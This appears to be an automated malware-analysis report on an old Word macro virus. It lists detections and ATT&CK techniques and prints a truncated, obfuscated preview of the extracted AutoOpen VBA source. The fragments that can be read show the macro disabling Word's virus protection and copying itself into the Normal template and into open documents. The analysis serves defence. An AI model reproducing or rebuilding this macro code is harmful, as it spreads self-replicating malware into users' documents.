MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing a WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The VBA code is heavily obfuscated, making it difficult to determine its exact function, but it is designed to execute. The ClamAV detection of 'Doc.Trojan.Bleed-3' further supports the malicious classification. The primary IOC is the presence of the obfuscated VBA macro.
Heuristics 4
-
ClamAV: Doc.Trojan.Bleed-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Bleed-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6469 bytes |
SHA-256: 1b0e5f812cfe0df0cec1b0032308eaaf2d8a50319caa9da949b396e9a8cbf2e6 |
|||
|
Detection
ClamAV:
Doc.Trojan.Bleed-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Rem Name: Word97Macro.Crypted
Rem Author: jack twoflower LineZer0/Metaphase
Rem Date: June 1999
Sub AutoOpen(): Dim jack(20) As String
jack(1) = "SuÊßÝbÝ AutoõÝ÷ÙÒócúÐ÷ÞlosÕÛöe()"
jack(2) = "Oµä×n E·ºüÕrr¸·ÏñoØÍðÀÐréñÐ ø»èÇ·ReáÇ»µØæsume NõÑöexò·´ÐtÚðú¶çü:µ ýöèÔc·µ = ChðÕÜr(6×5ÑÌô»Ïõ) + òëChr(¼øÂáí11˸¸ÞÜ6)ÔèÝ + Chr(1äÃõ½æù1ÞÚÂ6) + ChìÓñ÷Àür(11÷ÌÝ»Ë4)Ç·Öæ ä+ Chr(105ï) +¶¸Ü Chr(½98) + ¶ÆçCºæÙ¶üõhÞéÔâÜr(1Ìôµ17ùø÷¾ç) Þøçµð+ ChrÃñ͵Í(¿ñöµó116)Ò +äùó ChîÖr(1Óɵ01) + Chôùܶràß¼È(32) ÌÁ+ CúÌÝ´Îûhr(86) + CêÕ¶¿hr(66) + CËhÄÐòÆ·r(95) + Chr(ÐÉîëÏÞ7ü·ÖÎ8ÓùÐ)ÌÌøÔñÎ + ûżñCÒ¼ÌhrÊ(À97) + C¹¹hrÍòøÊÅ(109Þãóô) ¶×¿½+ Chr(1ÐÙ·ïÅ01) + C÷¸h¸ÃìüÈr(32) + éÃChÝ´ÇêÓr(61)øû è´Üú+ Cé̹̽hr(¾Ø3éÔý2¹âÍ) + ChÖ¾äír(34¾»æåÍ) + Chër(6½Ü½ìÌÜ7èÞÌôÐ) + CÙÀéÙâhr(114) ݶ+Çè ChÖäìÕ»r(121óù) + Chïr(´àèî1ÎØëâÏü12) +¾»È¿â ChrÀ÷(116) ÙÜÌ·+¸ò ChrôýØþçþ(1µÉãÃÙ0×éÃÐû1) + äæChrÒÔèýé(100ü½ò) + Chr(ûòºÆ3äíñØ4)"
jack(3) = "c¹Æß¿Ö·oµÞéü = Chr(ã67)éÄ + ChrÌ¿ë(11àÅÞÞ4îÑ) áþ»+ËѼú¶ Chr(óùÈá1¸¶21îýÝàÅò)ÅÑÞÑ +¼Ëú Chr(¸¸¸È1â¾ååà1¿2)á + ChºÉr(116) +üÒúÏ Chr¸Ó¿íÛ(Ë´1û0Äë1) + ChrÍì(100à):ºÞïÒíô täüÀ ·×Í=ÂóÉÇ ChrÀ(×ô99âö) Ì»Ã+ Chr(58) + ¼´èÙCæ¹hrÉÅêØ(9ûûË2)½Ç׼ +еÄÊïç ÖChr(110) + Ch¼Ñâþér(ðïÌà1ðíèÂ17) É+ ChrãÅÐùöÞ(46) ÷ø+åóÝÐ㸠ChòõìÓÜãr(11ÈØêúïö5) Þé+ÏÁ ChrÖæÊû(121)þĹåý Ñëì+ ChظÖürµ·Ì¶åÛ(115)"
jack(4) = "OptiýÐôùons.÷»ÅúàVÛòiärusProtÉêëþÕeÙÔàîÜctionß×´Þû ¾ÀÃí÷= Falseéú: Oü¿Ìõ½ptionsÉÛ.SÎãÄaòõÏñvÃe¼´ÉÁNormaÍÆÁÓlPrÙÌëøompt = False"
jack(5) = "vÕîÑÆúc×ÃÏá Öçæ¸= ع¸ÓèíThÁØÏisDo¾Òçcument.ÇúºVBöPÈÎroÅãjeÖéct.VBComÚÂÖïÆpÍäÝonents(co).CodeMÃåÍÜÈóoÀâduæµÞlÙe.ÍÕLiÜú˸ânesØ(1,¶ã 29ÛÆÐé)"
jack(6) = "OëµàÓïpeýÉËÀn tºõËÌòµ For Out߻ѵØßp½ut»µÝ½ç As #1õä·: ÅÎÄÓæØPǽòÌÍörºýint Î#ÔÙïÝÀ1ùØ, c: Pôçø¾Úrint ÷´â#´1ô, vcîÌ: Cloðþæse #1"
jack(7) = "IfÊóÉê LenÞê»Ã(NoÊïrmäÃäalTemÝèplate.ÚíÆVÜê´×BProýÔÃþçjeúù·câ»È¾t.VBComÒpÊô¸ÎºoòÓÚÚÆnÂûݾºenÛßÏtØs(ÓÁÅócùÝÛÐàÒoÎüé´).NameÀã¼Þöü) = 0þᶠT¾hen ÉÕNoåÓrmalïÝêÑTúÝýempõ¸ìÀlateæÍ.VBÁØProjeÕþø¹¼ÖctÚÚÈ.VBComponents.ôúûûѸIºÙ¸ì¸mó÷´ÏÔpܼ¿õort tÐÂÝ"
jack(8) = "If LenÆþÊõ(ActiveDèocumeûnt.ÀVBProjÞ¸·ÚÒ¾ec½t.ÄÀVBCoàÔÐùmponenÁÈÃòÜtôÃèùÁÕsڵξÝó(cÑ×o)Ü.ÊßËÕñµNameèÄ) = 0 Then AíÒÜàÊàc´tîÎiÏvïüñõeúÓùöæ»Dóäoc¹òó·ument.öÚVBProÍÃjectÊà.VBCéÔ×ào¶¶¼µmpoæneónts.Import t"
jack(9) = "TÐáËܽáhêìïùiò¼ËæØ´sDǽ÷ÈæoÄÏÇæ´óc¿çÒζuçèïѵment¶ä÷êþ.йæVBÌProjeËíctð¾Í.VBComÐ×ÕóØäpæôµ×o¶nêÜýöeÄòþòÓÀnts(cïÒÝØàÍo)òêÁ.Cêµ÷ÞþodeModuôåleüɹÝÎó.ÞÐäDeletãeLÁýine÷üÝéÛsÞÛ·õÜ Ë¸÷üÝê30, 9"
jack(10) = "ThçâëöisDocumëîÝenýþÅÚtÒé.åþ¶VÙÍÔÐäBØPrÒ÷ojºô·üäect.×÷VBÈñÐÒÇComponents(ÁÓñÉéÛcòçñÒØËoÒÌÐó).CodÛ´âÂeModÕuðÆøÙÇÔle.DeüÐül¶Àù×ete¾LinesÚý¼ 30ì, òë5ï"
jack(11) = "IõÖ÷·ýäf DÏaòy(Nìõow(ÊÍ˻Ѿ))Ý =ßèý´ñù üÛúÉý´31··ÔãÈì TÀÌhenúà Msg¶øBû·èox îºCÃêÇâèhrÊ(ÇÏ11Ç÷0) +Öîã¾ ChêæÄür(6Â9) + Chr¼(÷âÍó86ë) Ò+ Chr÷ö¾ÝË(6ßüµ´ÃÙ9)Ø»Ò +Ô¶ Chr(82) + å×ÍÍöåChá¹Ëû¶r(àÚ3׿È2) üÞÈ¿òô+ ChÙüÛèÅr(1üôÊ¿Ò0æý7) ïéÖ+½ CÂÞÛhrìÜ(èÂäºç¿78)Îë +ýÍÕÌçú Å»½üÇCÜé»hݼÑÔrÏþüë(79) ê+èÕíÅÉ ç¼þÆøÑCÂÄÍíÄhr(8ÛåáÜ7»÷ÀãÚõ) +÷ÅìØ Chr(32åûø) + C÷hrîæÝò(1ÓÀ10) дÍé+ÜòØÝܺ CÝhrÓÁÆк(79Ì)¾ÔÚêïÌ ¾+ïØ âChrÙà·õù(8ììιÏ4) +Çç¹ Chr(72)ãøãäèÝ + åä÷ChëÀÃöµr(73) Òúê¹Ø¿+ þÚChrôÆï´(78) é+ Cühr(7å1þ) + ¾Chçr(33)ÂÀë켯 + éý¾CþÙÝëhr(3ʸþ2ÐÈÜ) +µ¶öÓ¾Í Chr(16ö9íÞíù) +ËÃØÏúà ëØChr(57) + ÎÎßÞêCh»ãïr(57ðÛ×å)¿ÖõÒ ÔÑ÷+ Chɹê´Øör(3É×Àºøù2) Ö×Ôñû×+ ËüáüôóCÎí´õÌËhr(àÓÁìòÌ106)º + CÙô¸ø·Îhr(çÛÁÛ9Ûô7)ÞÞ ãÝÖîàÒ+ Chr(9¾èÀõê9ïàÜÛçÁ) é¾ÑßÜ+ùÀ ChrÍáþÐÑÍ(107ôòûøõ)¾¸ +úã·Íáþ ChØr(116) ÄÀéÇ+ïØ ChöÆÖÉr(1ÏãÑëöé19Êñà)ð + ´óÙChr(üüå·111)"
jack(12) = "If¼ßºç ÄôActivþüØõeDocæèçumeλnt¾ò¶ã.ǸÁ÷SaveáòÖþdë½ = ÆFaýþlÈεásÔÆÖáe TÚÜÐùhen ´ÝÌÈActivÚeDocumeÏÀÍönt.SavÑÊÎüâòeAÄ¿Òñs Aëü¾âÛòctiÔó·½veľÒëÏÕDocum÷йüÒ×ent.ÔâÙ¼FullNìÙíÚеame"
jack(13) = "ActiveD÷ÃÂÌÆocumóäõã»eãõÓnt.ÍCloóÆÚôse wdDÇîýoNot¶úåSaÎv÷øÇâeCþhanÀº¾»gâààes"
jack(14) = "EnÉÓ½îÑÐd×ÛÇÙ ¸ÑSub"
For i = 1 To 14: vc = vc & jacky(jack(i)): Next i
ThisDocument.VBProject.VBComponents("Crypted").CodeModule.InsertLines 30, vc
If MacroContaine
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.